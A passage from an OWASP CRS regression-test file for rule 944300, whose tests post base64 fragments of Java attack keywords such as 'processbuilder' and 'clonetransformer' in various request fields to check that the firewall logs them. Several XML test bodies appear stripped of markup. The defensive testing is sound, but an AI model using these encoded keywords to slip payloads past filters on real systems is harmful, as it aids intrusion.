"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: BydW50aW1l + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-28 + desc: "XML attribute value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-29 + desc: "XML element value includes keyword BydW50aW1l" + stages: + - 
stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-30 + desc: "Nested XML element value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-31 + desc: "Content-Type text/plain includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=BydW50aW1l" + output: + log_contains: "id \"944300\"" + - test_title: 944300-32 + desc: "Content-Type application/json arg value includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + 
version: "HTTP/1.0" + data: "{\"test\": \"BydW50aW1l\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-33 + desc: "Content-Type application/json arg name includes keyword BydW50aW1l" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"BydW50aW1l\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-34 + desc: "Argument test includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-35 + desc: "Argument name includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-36 + desc: "Cookie test includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=cHJvY2Vzc2J1aWxkZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-37 + desc: "Cookie name includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: cHJvY2Vzc2J1aWxkZXI=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-38 + desc: "Request header test includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: cHJvY2Vzc2J1aWxkZXI + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-39 + desc: "XML attribute value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-40 + desc: "XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-41 + desc: "Nested XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-42 + desc: "Content-Type text/plain includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=cHJvY2Vzc2J1aWxkZXI" + output: + log_contains: "id \"944300\"" + - test_title: 944300-43 + desc: "Content-Type application/json arg value includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 
Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-44 + desc: "Content-Type application/json arg name includes keyword cHJvY2Vzc2J1aWxkZXI" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-45 + desc: "Argument test includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-46 + desc: "Argument name includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: 
"application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-47 + desc: "Cookie test includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=HByb2Nlc3NidWlsZGVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-48 + desc: "Cookie name includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: HByb2Nlc3NidWlsZGVy=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-49 + desc: "Request header test includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: HByb2Nlc3NidWlsZGVy + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-50 + desc: "XML attribute value includes keyword 
HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-51 + desc: "XML element value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-52 + desc: "Nested XML element value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-53 + desc: "Content-Type text/plain includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" 
+ Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=HByb2Nlc3NidWlsZGVy" + output: + log_contains: "id \"944300\"" + - test_title: 944300-54 + desc: "Content-Type application/json arg value includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-55 + desc: "Content-Type application/json arg name includes keyword HByb2Nlc3NidWlsZGVy" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-56 + desc: "Argument test includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-57 + desc: "Argument name includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + 
- stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-58 + desc: "Cookie test includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Bwcm9jZXNzYnVpbGRlcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-59 + desc: "Cookie name includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: Bwcm9jZXNzYnVpbGRlcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-60 + desc: "Request header test includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + 
Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Bwcm9jZXNzYnVpbGRlcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-61 + desc: "XML attribute value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-62 + desc: "XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-63 + desc: "Nested XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-64 + desc: "Content-Type text/plain includes keyword 
Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Bwcm9jZXNzYnVpbGRlcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-65 + desc: "Content-Type application/json arg value includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Bwcm9jZXNzYnVpbGRlcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-66 + desc: "Content-Type application/json arg name includes keyword Bwcm9jZXNzYnVpbGRlcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"Bwcm9jZXNzYnVpbGRlcg\": \"test\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-67 + desc: "Argument test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-68 + desc: "Argument name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg=test" + output: + log_contains: "id \"944300\"" + - test_title: 944300-69 + desc: "Cookie test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-70 + desc: "Cookie name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: 
Y2xvbmV0cmFuc2Zvcm1lcg=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-71 + desc: "Request header test includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: Y2xvbmV0cmFuc2Zvcm1lcg + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-72 + desc: "XML attribute value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944300\"" + - test_title: 944300-73 + desc: "XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-74 + desc: "Nested XML element value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 
80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-75 + desc: "Content-Type text/plain includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=Y2xvbmV0cmFuc2Zvcm1lcg" + output: + log_contains: "id \"944300\"" + - test_title: 944300-76 + desc: "Content-Type application/json arg value includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"Y2xvbmV0cmFuc2Zvcm1lcg\"}" + output: + log_contains: "id \"944300\"" + - test_title: 944300-77 + desc: "Content-Type application/json arg name includes keyword Y2xvbmV0cmFuc2Zvcm1lcg" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: 